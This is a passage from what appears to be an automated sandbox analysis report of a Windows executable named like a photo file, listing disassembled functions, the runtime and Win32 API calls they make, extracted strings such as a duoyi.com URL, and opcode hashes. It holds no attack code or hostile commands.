                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _setlocale$Ios_base_dtorstd::ios_base::_
                                                                • String ID: %s\%s$Chinese-simplified$MainDlg.cpp$tg.id
                                                                • API String ID: 4039960618-3883785973
                                                                • Opcode ID: 82a385ff978adc9646f81cfad6a2fd0c09c4a58a6ab96b84be5a5757fdc90144
                                                                • Instruction ID: 3f45cc59b0f571090dfef1f2e020ed0d8b30a36ead9bfc0fa3af5194f294fe21
                                                                • Opcode Fuzzy Hash: 82a385ff978adc9646f81cfad6a2fd0c09c4a58a6ab96b84be5a5757fdc90144
                                                                • Instruction Fuzzy Hash: 4C41A9711083849FD320EB65C886FDBBBD8FF84314F00492EF599972D2DA785845C756
                                                                Function 0045E7E0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 126COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::exception::exception.LIBCMT ref: 0045E8BA
                                                                • __CxxThrowException@8.LIBCMT ref: 0045E8D5
                                                                • std::exception::exception.LIBCMT ref: 0045E8F3
                                                                • __CxxThrowException@8.LIBCMT ref: 0045E90E
                                                                • std::exception::exception.LIBCMT ref: 0045E928
                                                                • __CxxThrowException@8.LIBCMT ref: 0045E943
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                • String ID: _
                                                                • API String ID: 3728558374-2179862614
                                                                • Opcode ID: 2ebdffc1dd9e4999cadd27efd9a77b9e471cf4bf8fc11fe46b819e3d60fd7c05
                                                                • Instruction ID: 5834bd230cbc7b64ff1d98f061d29040cbf47aed4e1b88eb1aacf49de7dd7cae
                                                                • Opcode Fuzzy Hash: 2ebdffc1dd9e4999cadd27efd9a77b9e471cf4bf8fc11fe46b819e3d60fd7c05
                                                                • Instruction Fuzzy Hash: B251BCB19002049FCB04EF8AC581A9EBBF1FF49314F19815EE805AB352D775EE45CBA0
                                                                Function 004061DF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 119COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040638A: _memset.LIBCMT ref: 004063FF
                                                                  • Part of subcall function 0040638A: _wcslen.LIBCMT ref: 00406429
                                                                  • Part of subcall function 0040638A: _wcslen.LIBCMT ref: 00406443
                                                                  • Part of subcall function 0040638A: GetPrivateProfileStringW.KERNEL32(Duoyi.com-Launcher,InstallPath,005FC63C,?,00000800,?), ref: 004064B9
                                                                  • Part of subcall function 0040638A: PathFileExistsW.SHLWAPI(?,3D09168B,about_protocol,about_protocol_default), ref: 004064E1
                                                                  • Part of subcall function 0040638A: _wcslen.LIBCMT ref: 004064F2
                                                                  • Part of subcall function 0044C4F0: _wcslen.LIBCMT ref: 0044C53D
                                                                  • Part of subcall function 004019E2: _memmove.LIBCMT ref: 004019FE
                                                                • PathFileExistsW.SHLWAPI(?,00000001), ref: 00406280
                                                                • _memset.LIBCMT ref: 004062A0
                                                                • GetPrivateProfileStringW.KERNEL32(Debug,TestClient,005FD458,?,00000800,?), ref: 004062D9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$ExistsFilePathPrivateProfileString_memset$_memmove
                                                                • String ID: Debug$MainDlg.cpp$TestClient$about_protocol
                                                                • API String ID: 3415581266-1624307125
                                                                • Opcode ID: e66d68366263409efb8ed7a6755c0a76c2f36bce7997060c9140ac1a4f878bf3
                                                                • Instruction ID: 8c8e061bcdd2887ac0401f133bbd5581a631ad69ad8e5cc0fafdab85018f20e0
                                                                • Opcode Fuzzy Hash: e66d68366263409efb8ed7a6755c0a76c2f36bce7997060c9140ac1a4f878bf3
                                                                • Instruction Fuzzy Hash: 51417871904294AFDB10DB65CC45BEE7BB9EF05304F0444FAE949AB181D7B89A84CB64
                                                                Function 0045E9A0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::exception::exception.LIBCMT ref: 0045EA52
                                                                • __CxxThrowException@8.LIBCMT ref: 0045EA6D
                                                                • std::exception::exception.LIBCMT ref: 0045EA90
                                                                • __CxxThrowException@8.LIBCMT ref: 0045EAAB
                                                                • std::exception::exception.LIBCMT ref: 0045EACA
                                                                • __CxxThrowException@8.LIBCMT ref: 0045EAE5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                • String ID: _
                                                                • API String ID: 3728558374-2179862614
                                                                • Opcode ID: ae27c5a58b0f7eda9de162d353550966c250ec0414d69a15e47e749e950d5224
                                                                • Instruction ID: e743f492597ae0aff2a0358b7ae268eb4c7c5113093f55dcd46e6d1a047fafee
                                                                • Opcode Fuzzy Hash: ae27c5a58b0f7eda9de162d353550966c250ec0414d69a15e47e749e950d5224
                                                                • Instruction Fuzzy Hash: 1241A1719002049FCB14EF9AC845AEEBBF4BF48358F14411EE916A7392D7799E04CB54
                                                                Function 00465EC0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00465EED
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00465F10
                                                                • std::bad_exception::bad_exception.LIBCMT ref: 00465F94
                                                                • __CxxThrowException@8.LIBCMT ref: 00465FA2
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00465FB5
                                                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 00465FCF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                • String ID: bad cast
                                                                • API String ID: 2427920155-3145022300
                                                                • Opcode ID: 0d2037a747e74e946c6ac3f4ccb05238b023ec44b4547c9e2e9117e7bb1ceead
                                                                • Instruction ID: 3d2709fc2803028eea2610943fa3e1fca9683fa5347a25ea5f7cba3f4ae01a88
                                                                • Opcode Fuzzy Hash: 0d2037a747e74e946c6ac3f4ccb05238b023ec44b4547c9e2e9117e7bb1ceead
                                                                • Instruction Fuzzy Hash: C831E231900A058BDB18EF54D845BAEB7B5FB15324F58061FE816A7391EB38AE00CB96
                                                                Function 0045ED80 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0045EB80: std::exception::exception.LIBCMT ref: 0045EC9A
                                                                  • Part of subcall function 0045EB80: __CxxThrowException@8.LIBCMT ref: 0045ECB5
                                                                  • Part of subcall function 0045EB80: std::exception::exception.LIBCMT ref: 0045ECD3
                                                                  • Part of subcall function 0045EB80: __CxxThrowException@8.LIBCMT ref: 0045ECEE
                                                                  • Part of subcall function 0045EB80: std::exception::exception.LIBCMT ref: 0045ED08
                                                                  • Part of subcall function 0045EB80: __CxxThrowException@8.LIBCMT ref: 0045ED23
                                                                • std::exception::exception.LIBCMT ref: 0045EE02
                                                                • __CxxThrowException@8.LIBCMT ref: 0045EE1D
                                                                • std::exception::exception.LIBCMT ref: 0045EE3B
                                                                • __CxxThrowException@8.LIBCMT ref: 0045EE56
                                                                • std::exception::exception.LIBCMT ref: 0045EE70
                                                                • __CxxThrowException@8.LIBCMT ref: 0045EE8B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                • String ID: _
                                                                • API String ID: 3728558374-2179862614
                                                                • Opcode ID: bd72a5287f5600ca29863136bfc952bcb8728aa77ff5cbebdbd9068f98576320
                                                                • Instruction ID: b7647b2a8b4d26031239a92fcf361b12a636a632269e99eae3b354be2c91340b
                                                                • Opcode Fuzzy Hash: bd72a5287f5600ca29863136bfc952bcb8728aa77ff5cbebdbd9068f98576320
                                                                • Instruction Fuzzy Hash: 4731E671900205AFCB04EF99C5419EEBBF4AF48358F15805FE905AB352DB749B44CBA5
                                                                Function 0044E290 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 0044E30F
                                                                • _wcslen.LIBCMT ref: 0044E31C
                                                                  • Part of subcall function 00460340: _memset.LIBCMT ref: 00460368
                                                                  • Part of subcall function 0044A180: _wcslen.LIBCMT ref: 0044A1EA
                                                                  • Part of subcall function 00455B40: _wcslen.LIBCMT ref: 00455C1E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$_memset
                                                                • String ID: P"c$P"c$device_id$https://chc-bd.duoyi.com$x"c
                                                                • API String ID: 103582719-2650225894
                                                                • Opcode ID: 8ebf8dcf0ae68d31bbdbd6120c9066b08af5a2e0b3767458905a46faa84c6896
                                                                • Instruction ID: 8cf88f960e7f557ccb7218ebbbcb6c10f56b726e5989c7622a04d0bd0dd851d4
                                                                • Opcode Fuzzy Hash: 8ebf8dcf0ae68d31bbdbd6120c9066b08af5a2e0b3767458905a46faa84c6896
                                                                • Instruction Fuzzy Hash: 2C213671E00248ABCB00EFA99C5266FBBA6FB45308F40452FF80567342CA785A08C7E6
                                                                Function 00448D00 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 00448D5A
                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,?,00000000), ref: 00448D72
                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00448D8A
                                                                • _wcslen.LIBCMT ref: 00448D9B
                                                                • CoTaskMemFree.OLE32(00000000), ref: 00448DB9
                                                                • CoUninitialize.OLE32 ref: 00448DBF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: FolderFreeFromInitializeListLocationPathSpecialTaskUninitialize_wcslen
                                                                • String ID: about_protocol
                                                                • API String ID: 1819499117-2229189925
                                                                • Opcode ID: 9b1e328e260d5ebb1670e8bfd596d6fdffe9afd8bb9c5dbc19965658d866234f
                                                                • Instruction ID: f4c7f01ecb3b804b22f9f1e4278f00185f8240119fa1399df8ca4f20783335d0
                                                                • Opcode Fuzzy Hash: 9b1e328e260d5ebb1670e8bfd596d6fdffe9afd8bb9c5dbc19965658d866234f
                                                                • Instruction Fuzzy Hash: 12215EB19402189FDB20EF65DC48BAEB7B8FB94704F10469EE40AD3690DB749A45CB54
                                                                Function 0049AEBA Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • __getptd.LIBCMT ref: 0049AEC6
                                                                  • Part of subcall function 00496A53: __getptd_noexit.LIBCMT ref: 00496A56
                                                                  • Part of subcall function 00496A53: __amsg_exit.LIBCMT ref: 00496A63
                                                                • __amsg_exit.LIBCMT ref: 0049AEE6
                                                                • __lock.LIBCMT ref: 0049AEF6
                                                                • InterlockedDecrement.KERNEL32(?), ref: 0049AF13
                                                                • _free.LIBCMT ref: 0049AF26
                                                                • InterlockedIncrement.KERNEL32(007A2D20), ref: 0049AF3E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                • String ID: -z
                                                                • API String ID: 3470314060-1475763519
                                                                • Opcode ID: e033a580b979edab57ee0d1fd48a440d0951badfe3b8b729b1c2a65d41c9c606
                                                                • Instruction ID: 56b0d18d92e5ff62f13820c7785c70bd49c19c713e5bae69f6aec0d134f3aca4
                                                                • Opcode Fuzzy Hash: e033a580b979edab57ee0d1fd48a440d0951badfe3b8b729b1c2a65d41c9c606
                                                                • Instruction Fuzzy Hash: 4F01E131940610EBDF10FB66980679E7FA2FF05714F19412BE81467691CB3CAC91CBDA
                                                                Function 004555B0 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 164COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InitializeCriticalSection.KERNEL32(00632228,?), ref: 00455697
                                                                • EnterCriticalSection.KERNEL32(00632228,00000000,?,00410ABF,00000000,?,?,info_version,?,00000001,00000001,00000001,?,?,?,005FEAF0), ref: 004556C6
                                                                • LeaveCriticalSection.KERNEL32(00632228,?,00410ABF,00000000,?,?,info_version,?,00000001,00000001,00000001,?,?,?,005FEAF0,00000001), ref: 004556F5
                                                                • InitializeCriticalSection.KERNEL32(006321FC), ref: 0045577B
                                                                • EnterCriticalSection.KERNEL32(006321FC,?,?,?,?,3D09168B,00000000,?,00000000,?,00410ABF,00000000,?,?,info_version,?), ref: 004557B0
                                                                • LeaveCriticalSection.KERNEL32(006321FC,?,?,?,?,3D09168B,00000000,?,00000000,?,00410ABF,00000000,?,?,info_version,?), ref: 004557DF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$EnterInitializeLeave
                                                                • String ID: AddCommonBigDataAttribute %s:%s$util\Statistic.cpp
                                                                • API String ID: 3991485460-3536421312
                                                                • Opcode ID: c3dc31ed03fe189669fe3a3637d1e6bfc3d59000b833749e33300a6261386610
                                                                • Instruction ID: b15f67645765a100f30361560a4d8b3380f202d9f337a3bca8a9eae5d9834eba
                                                                • Opcode Fuzzy Hash: c3dc31ed03fe189669fe3a3637d1e6bfc3d59000b833749e33300a6261386610
                                                                • Instruction Fuzzy Hash: FA61E1B06043429FC310EF18EC51A1BBBE1BB49714F004B1EFA65873A1C775AA44CBE6
                                                                Function 0046EC80 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 156COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(00632228,?), ref: 0046ED27
                                                                • LeaveCriticalSection.KERNEL32(00632228), ref: 0046ED56
                                                                • InitializeCriticalSection.KERNEL32(00632228,00634D40,?,3D09168B,?,?,?,?,005A09A0,000000FF,?,0046BF22,?,?), ref: 0046ECF2
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • InitializeCriticalSection.KERNEL32(006321FC), ref: 0046EDCE
                                                                • EnterCriticalSection.KERNEL32(006321FC), ref: 0046EE0A
                                                                • LeaveCriticalSection.KERNEL32(006321FC), ref: 0046EE39
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$EnterInitializeLeave$_malloc
                                                                • String ID: CancelDownloadFile $DownloadTaskQueue.cpp
                                                                • API String ID: 2909137988-3331046287
                                                                • Opcode ID: b90db5fe8f3158a9f7a92971e92c8fd28e979e71d218d5a425285b5a33b2bfc8
                                                                • Instruction ID: df91533de16036e6d71b9e0fcd343206aba21eab35d115c2d88efe7ab961bc80
